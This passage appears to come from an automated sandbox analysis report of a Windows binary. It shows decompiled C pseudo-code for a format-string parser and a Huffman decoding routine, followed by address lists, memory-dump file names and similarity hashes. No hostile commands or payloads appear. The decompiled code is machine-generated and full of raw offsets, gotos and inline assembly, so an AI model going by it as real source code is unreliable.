														 *((short*)(_t135 + _t102 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t102 = _t102 + 2;
														__eflags = _t102;
														L62:
														_t130 =  *((intOrPtr*)(_t134 + 0x24)) -  *((intOrPtr*)(_t134 + 0x38)) - _t102;
														__eflags = _t124 & 0x0000000c;
														if((_t124 & 0x0000000c) == 0) {
															E00C531B0(_t134 + 0x448, 0x20, _t130, _t134 + 0x18);
															_t136 = _t136 + 0x10;
														}
														E00C54C36(_t134 + 0x448,  &_v16, _t102, _t134 + 0x18,  *((intOrPtr*)(_t134 + 0xc)));
														_t113 =  *(_t134 + 0x20);
														_t103 = _t134 + 0x18;
														_t75 = _t113 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t115 = _t113 >> 2;
															__eflags = _t115 & 0x00000001;
															if((_t115 & 0x00000001) == 0) {
																E00C531B0(_t134 + 0x448, 0x30, _t130, _t103);
																_t136 = _t136 + 0x10;
															}
														}
														E00C54B18(_t134, 0);
														__eflags =  *_t103;
														if( *_t103 >= 0) {
															_t78 =  *(_t134 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E00C531B0(_t134 + 0x448, 0x20, _t130, _t103);
															}
														}
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t111 - _t86;
													if(_t111 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t132 = 0x41;
											__eflags = _t111 - _t132;
											if(_t111 == _t132) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t111 - _t88;
									if(_t111 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t124 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t124;
									if((1 & _t124) == 0) {
										_t92 = _t124 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t126;
										L45:
										_t102 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							_t57 = 0;
							goto L72;
						}
						_t95 = _t55;
						__eflags = _t95;
						if(__eflags == 0) {
							L28:
							_push(_t102);
							_push(0xa);
							L29:
							_t56 = E00C546B3(_t134, _t125, __eflags);
							goto L10;
						}
						__eflags = _t95 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E00C54890(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E00C54419(_t102, _t134);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t134 + 0x20;
						 *_t3 =  *(_t134 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E00C547FD(__ecx, _t123);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E00C54871(__ecx);
					goto L10;
				}
				if(_t138 == 0) {
					goto L27;
				}
				_t139 = _t54 - _t105;
				if(_t139 > 0) {
					_t97 = _t54 - 0x5a;
					__eflags = _t97;
					if(_t97 == 0) {
						_t56 = E00C5425C(__ecx);
						goto L10;
					}
					_t98 = _t97 - 7;
					__eflags = _t98;
					if(_t98 == 0) {
						goto L30;
					}
					__eflags = _t98;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E00C5461B(_t134, __eflags, _t102);
					goto L10;
				}
				if(_t139 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t123) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}












































                                            0x00c53ee9
                                            0x00c53ef1
                                            0x00c53ef8
                                            0x00c53efd
                                            0x00c53eff
                                            0x00c53f03
                                            0x00c53f06
                                            0x00c53f0a
                                            0x00c53f0b
                                            0x00c53f0e
                                            0x00c53f7b
                                            0x00c53f7e
                                            0x00c53fcd
                                            0x00c53fcd
                                            0x00c53fd0
                                            0x00c53f3c
                                            0x00c53f3e
                                            0x00c53f43
                                            0x00c53f45
                                            0x00c53feb
                                            0x00c53fee
                                            0x00c54134
                                            0x00c54134
                                            0x00c54136
                                            0x00c54145
                                            0x00c54145
                                            0x00c53ff4
                                            0x00c53ff9
                                            0x00c53ffc
                                            0x00c53fff
                                            0x00c54003
                                            0x00c54009
                                            0x00c5400a
                                            0x00c5400c
                                            0x00c54036
                                            0x00c54036
                                            0x00c5403a
                                            0x00c5403d
                                            0x00c54047
                                            0x00c54049
                                            0x00c5404c
                                            0x00c5404e
                                            0x00c54054
                                            0x00c54054
                                            0x00c54056
                                            0x00c54056
                                            0x00c54059
                                            0x00c54067
                                            0x00c54067
                                            0x00c54069
                                            0x00c5406b
                                            0x00c5406c
                                            0x00c5406e
                                            0x00c54074
                                            0x00c54076
                                            0x00c54077
                                            0x00c5407c
                                            0x00c5407f
                                            0x00c5408d
                                            0x00c5408d
                                            0x00c5408f
                                            0x00c5408f
                                            0x00c5409a
                                            0x00c5409c
                                            0x00c540a1
                                            0x00c540a1
                                            0x00c540a4
                                            0x00c540aa
                                            0x00c540ac
                                            0x00c540af
                                            0x00c540bf
                                            0x00c540c4
                                            0x00c540c4
                                            0x00c540d9
                                            0x00c540de
                                            0x00c540e1
                                            0x00c540e6
                                            0x00c540e9
                                            0x00c540eb
                                            0x00c540ed
                                            0x00c540f0
                                            0x00c540f3
                                            0x00c54100
                                            0x00c54105
                                            0x00c54105
                                            0x00c540f3
                                            0x00c5410c
                                            0x00c54111
                                            0x00c54114
                                            0x00c54119
                                            0x00c5411c
                                            0x00c5411e
                                            0x00c5412b
                                            0x00c54130
                                            0x00c5411e
                                            0x00000000
                                            0x00c54133
                                            0x00c54083
                                            0x00c54084
                                            0x00c54087
                                            0x00000000
                                            0x00000000
                                            0x00c54089
                                            0x00000000
                                            0x00c54089
                                            0x00c54070
                                            0x00c54072
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c54072
                                            0x00c5405d
                                            0x00c5405e
                                            0x00c54061
                                            0x00000000
                                            0x00000000
                                            0x00c54063
                                            0x00000000
                                            0x00c54063
                                            0x00000000
                                            0x00c54050
                                            0x00c54041
                                            0x00c54042
                                            0x00c54045
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c54045
                                            0x00c54010
                                            0x00c54013
                                            0x00c54015
                                            0x00c54020
                                            0x00c54022
                                            0x00c5402a
                                            0x00c5402c
                                            0x00c5402e
                                            0x00000000
                                            0x00000000
                                            0x00c54030
                                            0x00c54034
                                            0x00c54034
                                            0x00000000
                                            0x00c54034
                                            0x00c54024
                                            0x00c54019
                                            0x00c54019
                                            0x00c5401a
                                            0x00000000
                                            0x00c5401a
                                            0x00c54017
                                            0x00000000
                                            0x00c54017
                                            0x00c53f4b
                                            0x00c53f4b
                                            0x00000000
                                            0x00c53f4b
                                            0x00c53fd7
                                            0x00c53fd7
                                            0x00c53fda
                                            0x00c53fac
                                            0x00c53fac
                                            0x00c53fad
                                            0x00c53faf
                                            0x00c53fb1
                                            0x00000000
                                            0x00c53fb1
                                            0x00c53fdc
                                            0x00c53fdf
                                            0x00000000
                                            0x00000000
                                            0x00c53fe5
                                            0x00c53f54
                                            0x00c53f54
                                            0x00000000
                                            0x00c53f54
                                            0x00c53f80
                                            0x00c53fc3
                                            0x00000000
                                            0x00c53fc3
                                            0x00c53f82
                                            0x00c53f85
                                            0x00c53fb8
                                            0x00c53fba
                                            0x00000000
                                            0x00c53fba
                                            0x00c53f87
                                            0x00c53f8a
                                            0x00c53fa8
                                            0x00c53fa8
                                            0x00c53fa8
                                            0x00c53fa8
                                            0x00000000
                                            0x00c53fa8
                                            0x00c53f8c
                                            0x00c53f8f
                                            0x00c53fa1
                                            0x00000000
                                            0x00c53fa1
                                            0x00c53f91
                                            0x00c53f94
                                            0x00000000
                                            0x00000000
                                            0x00c53f98
                                            0x00000000
                                            0x00c53f98
                                            0x00c53f10
                                            0x00000000
                                            0x00000000
                                            0x00c53f16
                                            0x00c53f18
                                            0x00c53f58
                                            0x00c53f58
                                            0x00c53f5b
                                            0x00c53f74
                                            0x00000000
                                            0x00c53f74
                                            0x00c53f5d
                                            0x00c53f5d
                                            0x00c53f60
                                            0x00000000
                                            0x00000000
                                            0x00c53f63
                                            0x00c53f66
                                            0x00000000
                                            0x00000000
                                            0x00c53f68
                                            0x00c53f6b
                                            0x00000000
                                            0x00c53f6b
                                            0x00c53f1a
                                            0x00c53f52
                                            0x00000000
                                            0x00c53f52
                                            0x00c53f1e
                                            0x00000000
                                            0x00000000
                                            0x00c53f27
                                            0x00000000
                                            0x00000000
                                            0x00c53f2c
                                            0x00000000
                                            0x00000000
                                            0x00c53f31
                                            0x00000000
                                            0x00000000
                                            0x00c53f3a
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0a2387265076e0cdcfb7d841eee8c590013677e1b9e93d0a3c95ac9b02f4a8a
                                            • Instruction ID: 6c0397ff1959f13766bedfed2351c53cb133ae344268471dd1374641f80e31e6
                                            • Opcode Fuzzy Hash: f0a2387265076e0cdcfb7d841eee8c590013677e1b9e93d0a3c95ac9b02f4a8a
                                            • Instruction Fuzzy Hash: E3618C7DA0078866DF3C85A858917BE23A4DB8178BF20069AED63CB1C1D611DFCD921D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4397F, Relevance: .2, Instructions: 232COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 72%
                                            			E00C4397F(void* __ecx) {
				signed int _t71;
				signed int _t72;
				signed int _t73;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t90;
				signed int _t94;
				signed int _t109;
				intOrPtr* _t111;
				signed int _t114;
				intOrPtr _t115;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t135;
				signed int _t138;
				intOrPtr* _t139;
				intOrPtr* _t150;
				void* _t151;
				signed int _t154;
				unsigned int _t159;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				intOrPtr* _t168;
				void* _t170;
				void* _t171;

				_t170 = __ecx;
				if( *((char*)( *((intOrPtr*)(_t171 + 8)) + 0x11)) != 0) {
					_t168 =  *((intOrPtr*)(_t171 + 0x1d8));
					__eflags =  *((char*)(_t168 + 8));
					if( *((char*)(_t168 + 8)) != 0) {
						L5:
						_t164 = 0;
						__eflags = 0;
						do {
							_t109 = E00C3A4E8(_t168) >> 0x0000000c & 0x000000ff;
							E00C3A4D1(_t168, 4);
							__eflags = _t109 - 0xf;
							if(_t109 != 0xf) {
								 *(_t171 + _t164 + 0x18) = _t109;
								goto L14;
							}
							_t124 = E00C3A4E8(_t168) >> 0x0000000c & 0x000000ff;
							E00C3A4D1(_t168, 4);
							__eflags = _t124;
							if(_t124 != 0) {
								_t125 = _t124 + 2;
								__eflags = _t125;
								while(1) {
									_t125 = _t125 - 1;
									__eflags = _t164 - 0x14;
									if(_t164 >= 0x14) {
										break;
									}
									 *(_t171 + _t164 + 0x18) = 0;
									_t164 = _t164 + 1;
									__eflags = _t125;
									if(_t125 != 0) {
										continue;
									}
									break;
								}
								_t164 = _t164 - 1;
								goto L14;
							}
							 *(_t171 + _t164 + 0x18) = 0xf;
							L14:
							_t164 = _t164 + 1;
							__eflags = _t164 - 0x14;
						} while (_t164 < 0x14);
						_push(0x14);
						_t111 =  *((intOrPtr*)(_t171 + 0x1e8)) + 0x3bb0;
						_push(_t111);
						_push(_t171 + 0x18);
						 *((intOrPtr*)(_t171 + 0x20)) = _t111;
						E00C42C88();
						_t165 = 0;
						__eflags = 0;
						do {
							__eflags =  *((char*)(_t168 + 8));
							if( *((char*)(_t168 + 8)) != 0) {
								L19:
								_t71 = E00C3A4ED(_t168);
								_t72 =  *(_t111 + 0x84);
								_t159 = _t71 & 0x0000fffe;
								__eflags = _t159 -  *((intOrPtr*)(_t111 + 4 + _t72 * 4));
								if(_t159 >=  *((intOrPtr*)(_t111 + 4 + _t72 * 4))) {
									_t131 = 0xf;
									_t73 = _t72 + 1;
									 *(_t171 + 0x10) = _t131;
									__eflags = _t73 - _t131;
									if(_t73 >= _t131) {
										L27:
										_t133 =  *(_t168 + 4) +  *(_t171 + 0x10);
										 *_t168 =  *_t168 + (_t133 >> 3);
										_t76 =  *(_t171 + 0x10);
										 *(_t168 + 4) = _t133 & 0x00000007;
										_t135 = 0x10;
										_t138 =  *((intOrPtr*)(_t111 + 0x44 + _t76 * 4)) + (_t159 -  *((intOrPtr*)(_t111 + _t76 * 4)) >> _t135 - _t76);
										__eflags = _t138 -  *_t111;
										asm("sbb eax, eax");
										_t77 = _t76 & _t138;
										__eflags = _t77;
										_t78 =  *(_t111 + 0xc88 + _t77 * 2) & 0x0000ffff;
										L28:
										__eflags = _t78 - 0x10;
										if(_t78 >= 0x10) {
											_t139 = _t168;
											__eflags = _t78 - 0x12;
											if(__eflags >= 0) {
												if(__eflags != 0) {
													_t114 = (E00C3A4E8(_t139) >> 9) + 0xb;
													__eflags = _t114;
													_push(7);
												} else {
													_t114 = (E00C3A4E8(_t139) >> 0xd) + 3;
													_push(3);
												}
												E00C3A4D1(_t168);
												while(1) {
													_t114 = _t114 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) = 0;
													_t165 = _t165 + 1;
													__eflags = _t114;
													if(_t114 != 0) {
														continue;
													}
													L44:
													_t111 =  *((intOrPtr*)(_t171 + 0x14));
													goto L45;
												}
												break;
											}
											__eflags = _t78 - 0x10;
											if(_t78 != 0x10) {
												_t121 = (E00C3A4E8(_t139) >> 9) + 0xb;
												__eflags = _t121;
												_push(7);
											} else {
												_t121 = (E00C3A4E8(_t139) >> 0xd) + 3;
												_push(3);
											}
											E00C3A4D1(_t168);
											__eflags = _t165;
											if(_t165 == 0) {
												L48:
												_t90 = 0;
												L50:
												L51:
												return _t90;
											} else {
												while(1) {
													_t121 = _t121 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) =  *((intOrPtr*)(_t171 + _t165 + 0x2b));
													_t165 = _t165 + 1;
													__eflags = _t121;
													if(_t121 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t171 + _t165 + 0x2c) = _t78;
										_t165 = _t165 + 1;
										goto L45;
									}
									_t150 = _t111 + (_t73 + 1) * 4;
									while(1) {
										__eflags = _t159 -  *_t150;
										if(_t159 <  *_t150) {
											break;
										}
										_t73 = _t73 + 1;
										_t150 = _t150 + 4;
										__eflags = _t73 - 0xf;
										if(_t73 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t171 + 0x10) = _t73;
									goto L27;
								}
								_t151 = 0x10;
								_t162 = _t159 >> _t151 - _t72;
								_t154 = ( *(_t162 + _t111 + 0x88) & 0x000000ff) +  *(_t168 + 4);
								 *_t168 =  *_t168 + (_t154 >> 3);
								 *(_t168 + 4) = _t154 & 0x00000007;
								_t78 =  *(_t111 + 0x488 + _t162 * 2) & 0x0000ffff;
								goto L28;
							}
							__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84)) - 5;
							if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84)) - 5) {
								goto L19;
							}
							_t94 = E00C44422(_t170);
							__eflags = _t94;
							if(_t94 == 0) {
								goto L48;
							}
							goto L19;
							L45:
							__eflags = _t165 - 0x1ae;
						} while (_t165 < 0x1ae);
						L46:
						 *((char*)(_t170 + 0xe662)) = 1;
						__eflags =  *((char*)(_t168 + 8));
						if( *((char*)(_t168 + 8)) != 0) {
							L49:
							_t115 =  *((intOrPtr*)(_t171 + 0x1e8));
							_push(0x132);
							_push(_t115);
							_push(_t171 + 0x2c);
							E00C42C88();
							_push(0x40);
							_push(_t115 + 0xeec);
							_push(_t171 + 0x166);
							E00C42C88();
							_push(0x10);
							_push(_t115 + 0x1dd8);
							_push(_t171 + 0x1a6);
							E00C42C88();
							_push(0x2c);
							_push(_t115 + 0x2cc4);
							_push(_t171 + 0x1b6);
							E00C42C88();
							_t90 = 1;
							goto L50;
						}
						__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84));
						if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84))) {
							goto L49;
						}
						goto L48;
					}
					__eflags =  *_t168 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
					if( *_t168 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
						goto L5;
					}
					_t90 = E00C44422(__ecx);
					__eflags = _t90;
					if(_t90 == 0) {
						goto L51;
					}
					goto L5;
				}
				return 1;
			}

































                                            0x00c4398e
                                            0x00c43990
                                            0x00c4399a
                                            0x00c439a1
                                            0x00c439a5
                                            0x00c439c1
                                            0x00c439c2
                                            0x00c439c2
                                            0x00c439c5
                                            0x00c439d3
                                            0x00c439d6
                                            0x00c439db
                                            0x00c439de
                                            0x00c43a17
                                            0x00000000
                                            0x00c43a17
                                            0x00c439ee
                                            0x00c439f1
                                            0x00c439f6
                                            0x00c439f8
                                            0x00c43a01
                                            0x00c43a01
                                            0x00c43a04
                                            0x00c43a04
                                            0x00c43a05
                                            0x00c43a08
                                            0x00000000
                                            0x00000000
                                            0x00c43a0a
                                            0x00c43a0f
                                            0x00c43a10
                                            0x00c43a12
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c43a12
                                            0x00c43a14
                                            0x00000000
                                            0x00c43a14
                                            0x00c439fa
                                            0x00c43a1b
                                            0x00c43a1b
                                            0x00c43a1c
                                            0x00c43a1c
                                            0x00c43a2c
                                            0x00c43a2e
                                            0x00c43a36
                                            0x00c43a37
                                            0x00c43a38
                                            0x00c43a3c
                                            0x00c43a41
                                            0x00c43a41
                                            0x00c43a43
                                            0x00c43a43
                                            0x00c43a47
                                            0x00c43a65
                                            0x00c43a67
                                            0x00c43a6e
                                            0x00c43a74
                                            0x00c43a7a
                                            0x00c43a7e
                                            0x00c43aab
                                            0x00c43aac
                                            0x00c43aad
                                            0x00c43ab1
                                            0x00c43ab3
                                            0x00c43ace
                                            0x00c43ad1
                                            0x00c43add
                                            0x00c43adf
                                            0x00c43ae3
                                            0x00c43ae8
                                            0x00c43af4
                                            0x00c43af6
                                            0x00c43af8
                                            0x00c43afa
                                            0x00c43afa
                                            0x00c43afc
                                            0x00c43b04
                                            0x00c43b04
                                            0x00c43b07
                                            0x00c43b13
                                            0x00c43b15
                                            0x00c43b18
                                            0x00c43b62
                                            0x00c43b7f
                                            0x00c43b7f
                                            0x00c43b82
                                            0x00c43b64
                                            0x00c43b6e
                                            0x00c43b71
                                            0x00c43b71
                                            0x00c43b86
                                            0x00c43b8b
                                            0x00c43b8b
                                            0x00c43b8c
                                            0x00c43b92
                                            0x00000000
                                            0x00000000
                                            0x00c43b94
                                            0x00c43b99
                                            0x00c43b9a
                                            0x00c43b9c
                                            0x00000000
                                            0x00000000
                                            0x00c43b9e
                                            0x00c43b9e
                                            0x00000000
                                            0x00c43b9e
                                            0x00000000
                                            0x00c43b8b
                                            0x00c43b1a
                                            0x00c43b1d
                                            0x00c43b3a
                                            0x00c43b3a
                                            0x00c43b3d
                                            0x00c43b1f
                                            0x00c43b29
                                            0x00c43b2c
                                            0x00c43b2c
                                            0x00c43b41
                                            0x00c43b46
                                            0x00c43b48
                                            0x00c43bc5
                                            0x00c43bc5
                                            0x00c43c2c
                                            0x00c43c2e
                                            0x00000000
                                            0x00c43b4a
                                            0x00c43b4a
                                            0x00c43b4a
                                            0x00c43b4b
                                            0x00c43b51
                                            0x00000000
                                            0x00000000
                                            0x00c43b57
                                            0x00c43b5b
                                            0x00c43b5c
                                            0x00c43b5e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c43b60
                                            0x00000000
                                            0x00c43b4a
                                            0x00c43b48
                                            0x00c43b09
                                            0x00c43b0d
                                            0x00000000
                                            0x00c43b0d
                                            0x00c43ab8
                                            0x00c43abb
                                            0x00c43abb
                                            0x00c43abd
                                            0x00000000
                                            0x00000000
                                            0x00c43abf
                                            0x00c43ac0
                                            0x00c43ac3
                                            0x00c43ac6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c43ac8
                                            0x00c43aca
                                            0x00000000
                                            0x00c43aca
                                            0x00c43a82
                                            0x00c43a85
                                            0x00c43a8f
                                            0x00c43a97
                                            0x00c43a9c
                                            0x00c43a9f
                                            0x00000000
                                            0x00c43a9f
                                            0x00c43a52
                                            0x00c43a54
                                            0x00000000
                                            0x00000000
                                            0x00c43a58
                                            0x00c43a5d
                                            0x00c43a5f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c43ba2
                                            0x00c43ba2
                                            0x00c43ba2
                                            0x00c43bae
                                            0x00c43bae
                                            0x00c43bb5
                                            0x00c43bb9
                                            0x00c43bc9
                                            0x00c43bc9
                                            0x00c43bd4
                                            0x00c43bd9
                                            0x00c43bda
                                            0x00c43bdd
                                            0x00c43be2
                                            0x00c43bec
                                            0x00c43bf4
                                            0x00c43bf5
                                            0x00c43bfa
                                            0x00c43c04
                                            0x00c43c0c
                                            0x00c43c0d
                                            0x00c43c12
                                            0x00c43c1a
                                            0x00c43c22
                                            0x00c43c25
                                            0x00c43c2a
                                            0x00000000
                                            0x00c43c2a
                                            0x00c43bbd
                                            0x00c43bc3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c43bc3
                                            0x00c439b0
                                            0x00c439b2
                                            0x00000000
                                            0x00000000
                                            0x00c439b4
                                            0x00c439b9
                                            0x00c439bb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c439bb
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
                                            • Instruction ID: a24196a05c4e3f072b0e74f1256f164c0077bd8f808a7240cff72ff9c500b05d
                                            • Opcode Fuzzy Hash: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
                                            • Instruction Fuzzy Hash: 4A7144713043C68BEB34DE69C8C4BAD7790FBE0304F00492DE9D68B282DA748B85D752
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C53CBA, Relevance: .2, Instructions: 214COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                            • Instruction ID: e2cfc6c01576c783d28bafa4e8bf81326d6e8594f0b3615adc7bd7712e8040b0
                                            • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                            • Instruction Fuzzy Hash: A751483D620AC457DB384528849A7BF67F99B027C7F180509EC62CB282D649EFCD926D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3DADD, Relevance: .2, Instructions: 190COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c1a2e74793ad9982125662be90601c64426ac02d49c323024f651affc20000b
                                            • Instruction ID: a5ae182328365281652ed6760e791a3cd67f5a237ccc4214ede281f5b5b53ed8
                                            • Opcode Fuzzy Hash: 6c1a2e74793ad9982125662be90601c64426ac02d49c323024f651affc20000b
                                            • Instruction Fuzzy Hash: 46819A8212A6E49EC70A8F7D38A03B97FA15773341F1D40AAC4DEC72B7D1764A98D721
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3E510, Relevance: .2, Instructions: 154COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2fb28e247e6a0316ab1f0bbee8b786e4f8a62e03cf22459e209607d8994fc8ae
                                            • Instruction ID: 53592e84e2a65c04777bff19b3aa44209ffece8cab829054d76f00b8f2c2f9bc
                                            • Opcode Fuzzy Hash: 2fb28e247e6a0316ab1f0bbee8b786e4f8a62e03cf22459e209607d8994fc8ae
                                            • Instruction Fuzzy Hash: B351B3309183958FC712DF25919046EBFF1AFAA318F49489EF4E54B252D230DA89DF52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3F5C5, Relevance: .1, Instructions: 131COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b17eba50fc4b6e7fd7e47ac096c420b8d4c45b4b1422094cfd1b61370405b591
                                            • Instruction ID: 17b07bf278204a52793c16af9f36c0a02604935a44b97f3a670ddb38e400beda
                                            • Opcode Fuzzy Hash: b17eba50fc4b6e7fd7e47ac096c420b8d4c45b4b1422094cfd1b61370405b591
                                            • Instruction Fuzzy Hash: A45126B1A087028FC748CF19D49055AF7E1FF88314F054A2EE899A7740DB34EA59CB9A
